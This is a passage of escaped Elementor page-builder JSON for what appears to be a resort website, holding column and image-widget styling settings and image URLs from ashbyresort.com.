"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"f546c7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"164367c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61d1cf0\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"fe02551\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"8db9738\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/ResortPics.jpg\",\"id\":308},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d234255\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"421963b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"545c59d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3b08ea5\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"aac74de\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Kussatz.jpg\",\"id\":298},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"s